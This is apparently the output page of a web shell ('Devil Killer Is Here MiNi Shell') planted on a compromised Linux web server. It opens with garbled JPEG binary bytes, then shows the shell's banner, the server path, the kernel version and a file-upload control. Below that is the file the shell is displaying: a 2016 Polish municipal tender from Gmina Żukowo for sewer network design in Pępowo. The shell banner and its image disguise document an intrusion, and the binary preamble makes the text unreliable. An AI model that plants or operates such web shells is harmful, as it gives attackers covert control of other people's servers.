JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161107/337240-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.zukowo.pl/  ' target='_blank'>http://bip.zukowo.pl/  </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 337240 - 2016
              z dnia 2016-11-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żukowo: Wykonanie dokumentacji projektowo - kosztorysowej oraz opcjonalnie świadczenie usług nadzoru autorskiego dla zadania inwestycyjnego pn: Budowa sieci kanalizacji sanitarnej w rejonie ulic Gdańskiej, Lipowej, Staszica, Chłopskiej, Górnej oraz ulic do nich przyległych w miejscowości Pępowo". <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Żukowo, krajowy numer identyfikacyjny
              , ul.
              ul. Gdańska 
              52,
              83330  
              Żukowo, woj.
              pomorskie, państwo
              Polska, tel.
              +48 58 6858300, e-mail
              , faks
              +48 58 6858300.
              <br />
              Adres strony internetowej (URL): www.zukowo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zukowo.pl/  </div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zukowo.pl/  </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wniosek należy złożyć w formie pisemnej. Wykonawca winien zamieścić wnosek w kopercie, która będzie posiadała oznaczenie   WNIOSEK  DOKUMENTACJA - PĘPOWO.   Nr sprawy: ZP.271.50.2016.  <br />
                Adres:
                <br />Gmina Żukowo, ul. Gdańska 52, 83-330 Żukowo. Biuro Obsługi Klienta - pok. 3.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie dokumentacji projektowo - kosztorysowej oraz opcjonalnie świadczenie usług nadzoru autorskiego dla zadania inwestycyjnego pn: Budowa sieci kanalizacji sanitarnej w rejonie ulic Gdańskiej, Lipowej, Staszica, Chłopskiej, Górnej oraz ulic do nich przyległych w miejscowości Pępowo". <br /><b>Numer referencyjny: </b>ZP.271.50.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedsięwzięcie obejmuje wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie ostatecznego pozwolenia na budowę dla zadania inwestycyjnego pn. Budowa sieci kanalizacji sanitarnej w rejonie ulic Gdańskiej, Lipowej, Staszica, Chłopskiej, Górnej oraz ulic do nich przyległych w miejscowości Pępowo", dla obszaru określonego w koncepcji. Koncepcja stanowi ramowy program do opracowania dokumentacji i przedstawia obszar Gminy Żukowo przewidziany do objęcia nowoprojektowaną siecią kanalizacji sanitarnej. 
Szacunkowa długość projektowanej kanalizacji sanitarnej wynosi ok. 14,3 km. 
Opcjonalnie - świadczenie usług nadzoru autorskiego podczas realizacji robót budowlanych objętych dokumentacją projektową.<br /><br /><b>II.5) Główny kod CPV: </b>71240000-2<br /><b> Dodatkowe kody CPV:</b>71245000-7,
                71246000-4,
                71320000-7,
                71322200-3,
                71354000-4,
                71248000-8,
                45111250-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zasady i zakres zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP, zostaną określone w specyfikacji istotnych warunków zamówienia (SIWZ). <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Oczekiwany przez zamawiającego termin realizacji zamówienia w zakresie dokumentacji projektowo - kosztorysowej i uzyskania ostatecznego pozwolenia na budowę - do 31.12.2017 r.
W ramach prawa opcji zamawiający przewiduje świadczenie usługi polegającej na pełnieniu nadzoru autorskiego podczas realizacji robót budowlanych objętych dokumentacją projektową. 
Planowany termin realizacji robót budowlanych - lata 2017-2023.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że w zakresie zdolności zawodowej:
1) posiada doświadczenie polegające na wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej dwóch zamówień  polegających na opracowaniu dokumentacji projektowych dla budowy sieci wodociągowej / kanalizacyjnej o długości co najmniej 5000 m w ramach jednego zamówienia.
	
	Za zamówienia wykonane zostaną uznane usługi zakończone i odebrane przez zamawiającego przed upływem terminu składania ofert.
	Pod pojęciem sieć wodociągowa / kanalizacyjna rozumie się zaprojektowanie nowej sieci w określonym miejscu.  Kanalizacja  system kolektorów służący do odprowadzania ścieków sanitarnych (kanalizacja sanitarna), deszczowych (kanalizacja deszczowa) lub sanitarnych i deszczowych (kanalizacja ogólnospławna). 
2) 	dysponuje osobami o kwalifikacjach zawodowych
a) 	projektant (co najmniej jedna osoba), która:
- posiada uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji kanalizacyjnych, wodociągowych, gazowych bez ograniczeń lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
- zaprojektowała co najmniej dwie sieci kanalizacji sanitarnej w ramach odrębnych zamówień (odrębne pozwolenia na budowę) w ciągu ostatnich pięciu lat przed upływem terminu składania wniosków, w tym jedną sieć kanalizacji sanitarnej (grawitacyjnej / grawitacyjnej i tłocznej wraz  z przepompowniami) o długości co najmniej 10000 m (w ramach jednego zamówienia); 
b)	projektant (co najmniej jedna osoba), która:
- posiada uprawnienia budowlane do projektowania   w specjalności drogowej bez ograniczeń  lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c) 	projektant (co najmniej jedna osoba), która:
- posiada uprawnienia budowlane do projektowania   w specjalności instalacyjnej w zakresie instalacji, sieci i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. prawo budowlane (tekst jednolity - Dz. U. z  2016 r., poz. 290 z późn. zm.) oraz aktami wykonawczymi do w/w ustawy.  Dopuszcza się ważne i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów.
W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65 z późn. zm.).

Projektanci muszą być zrzeszeni we właściwej branżowo izbie samorządu zawodowego zgodnie ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity - Dz. U. z 2014 r.  poz. 1946 z późn. zm.).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki zostaną spełnione jeżeli w zakresie zdolności zawodowej w przypadku:
1)	posiadania doświadczenia -  każdy z wykonawców wykaże spełnienie w/w warunku oddzielnie albo co najmniej jeden z wykonawców wykaże spełnienie w/w warunku albo wykonawcy wspólnie wykażą spełnienie w/w warunku,
2)	dysponowania osobami o kwalifikacjach zawodowych  wykonawcy wspólnie wykażą, że dysponują osobami o wymaganych przez zamawiającego kwalifikacjach.
2. Wykonawca może w celu potwierdzenia spełniania warunków, w stosownych sytuacjach oraz w odniesieniu do zamówienia lub jego części, polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Wraz z wnioskiem o dopuszczenie do udziału w postępowaniu wykonawca złoży:
1) oświadczenie wykonawcy, iż nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 12-23 i art. 24 ust. 5 ustawy PZP (Załącznik nr 3 do OPiWZ),
2) odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.  </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wraz z wnioskiem o dopuszczenie do udziału w postępowaniu wykonawca złoży:
1) oświadczenie wykonawcy, że spełnia warunki udziału w postępowaniu i kryteria selekcji(Załącznik nr 3 do OPiWZ),
2) WYKAZ  USŁUG (Załącznik nr 5 do OPiWZ)  wykaz usług potwierdzający spełnienie warunku w zakresie doświadczenia. W wykazie należy wskazać usługi wykonane w okresie ostatnich pięciu lat przed upływem terminu składania wniosków. Do wykazu należy dołączyć dowody określające czy usługi zostały wykonane należycie. Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane. Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca niej jest w stanie uzyskać tych dokumentów  inne dokumenty.
3)	WYKAZ  OSÓB DO REALIZACJI  ZAMÓWIENIA  (Załącznik nr 6 do OPiWZ)  wykaz osób,  które zostaną skierowane przez wykonawcę do realizacji zamówienia i potwierdzający spełnienie warunku w zakresie dysponowania osobami o wymaganych kwalifikacjach zawodowych.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />W zakresie kryteriów selekcji wykonawca złoży: 
1) WYKAZ  USŁUG (Załącznik nr 5 do OPiWZ)  w wykazie należy wskazać usługi i podać informacje potwierdzające  kryterium selekcji w zakresie doświadczenia.
2)	WYKAZ  OSÓB DO REALIZACJI  ZAMÓWIENIA  (Załącznik nr 6 do OPiWZ)  w wykazie należy podać informacje dotyczące dysponowaniem osobami o wymaganych kwalifikacjach zawodowych potwierdzających kryterium selekcji w zakresie osób.</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Pełnomocnictwo (o ile dotyczy). 2) Informacja o dostępności dokumentów i oświadczeń
(Załącznik nr 7 do OPiWZ). 3) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania
braku istnienia wobec nich podstaw wykluczenia oraz spełnienia - w zakresie, w jakim powołuje się na ich zasoby
- warunków udziału w postępowaniu, składa także oświadczenie - Załącznik nr 3 do OPiWZ dotyczące tych
podmiotów. 4)Jeżeli wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 22a
ustawy PZP, wykonawca w odniesieniu do tych podmiotów składa odpis z właściwego
rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu
do rejestru lub ewidencji. 5) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej zamiast dokumentów o których mowa w pkt III.4) ogłoszenia składa dokument lub
dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto
jego likwidacji ani nie ogłoszono upadłości. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy
przed upływem terminu składania wniosków. 6) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów o których mowa wyżej, wykonawca składa oświadczenie, ze
wskazaniem osoby lub osób uprawnionych do jego reprezentacji lub oświadczenie osoby, której dokument
dotyczy, złożone przed notariuszem lub organem sądowym, administracyjnym albo samorządu zawodowego lub
gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce
zamieszkania tej osoby. Oświadczenie powinno być wystawione nie wcześniej niż 6 miesięcy przed upływem
terminu składania.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                dialog konkurencyjny
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający będzie wymagał wniesienia wadium od wykonawców zaproszonych do składania ofert. Zasady wnoszenia wadium zostaną opisane w specyfikacji istotnych warunków zamówienia (SIWZ).  </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  3<br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />1.	W przypadku, gdy liczba wykonawców spełniających warunki udziału w postępowaniu przekroczy trzy, wybór wykonawców zaproszonych do dialogu odbędzie się w oparciu o następujące kryteria selekcji w zakresie zdolności zawodowej:
1)	Doświadczenie (w ciągu ostatnich pięciu lat przed upływem terminu składania wniosków)
1.1)	za opracowanie dokumentacji projektowych dla budowy sieci kanalizacji sanitarnej w ramach projektów współfinansowanych  ze środków zewnętrznych (np. Unii Europejskiej)  po 1 pkt za każdą dokumentację, ale nie więcej niż 5 pkt; 
1.2)	za opracowanie dokumentacji projektowych dla budowy sieci kanalizacji sanitarnej o długości sieci powyżej 5000 m, która została zatwierdzona pozwoleniem  na budowę  po 1 pkt za każdą dokumentację, ale nie więcej niż 5 pkt;
1.3)	za robotę budowlaną obejmującą budowę sieci kanalizacji sanitarnej wykonaną i odebraną na podstawie opracowanej dokumentacji projektowej  po 1 pkt, ale nie więcej niż 5 pkt (dokumentacja projektowa opracowana w ciągu ostatnich pięciu lat przed upływem terminu składania wniosków).
Jeżeli na podstawie danej dokumentacji projektowej budowa kanalizacji sanitarnej była realizowana etapami (w ramach różnych umów) wykonawca otrzyma 1 pkt niezależnie od ilości zrealizowanych etapów. 
2)	Osoby do realizacji zamówienia 
2.1)	doświadczenie w projektowaniu projektanta branży sanitarnej wskazanego do realizacji zamówienia:
a) do 5 lat  1 pkt; 
b) od 5 lat do 10 lat  2 pkt;
c) 10 lat i więcej  3 pkt.
